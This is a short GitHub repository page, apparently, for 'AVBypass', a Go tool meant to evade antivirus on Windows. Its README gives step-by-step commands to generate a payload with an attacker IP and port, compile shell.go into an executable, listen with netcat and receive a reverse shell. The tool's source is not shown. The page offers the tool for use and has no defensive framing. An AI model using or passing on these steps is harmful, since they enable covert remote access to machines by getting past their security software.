kira2040k / AVBypass

golang script for bypass AV and work only in windows platform

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

antivirus bypass protection

requirements

  • golang installed

usage

1 - create your payload
        go run create.go <ip> <port> <secret> <any url>
        e.g: go run create.go 1.1.1.1 443 SecRet_kira https://www.youtube.com/watch?v=Rv4VzpGCEEM
2 - in output folder you will find shell.go compile it 
    go build shell.go

3 - now you have exe file to execute run netcat 

4 - you will receive reverse shell connection 

twitter: kira_321k

About

golang script for bypass AV and work only in windows platform


Languages

Language:Go 100.0%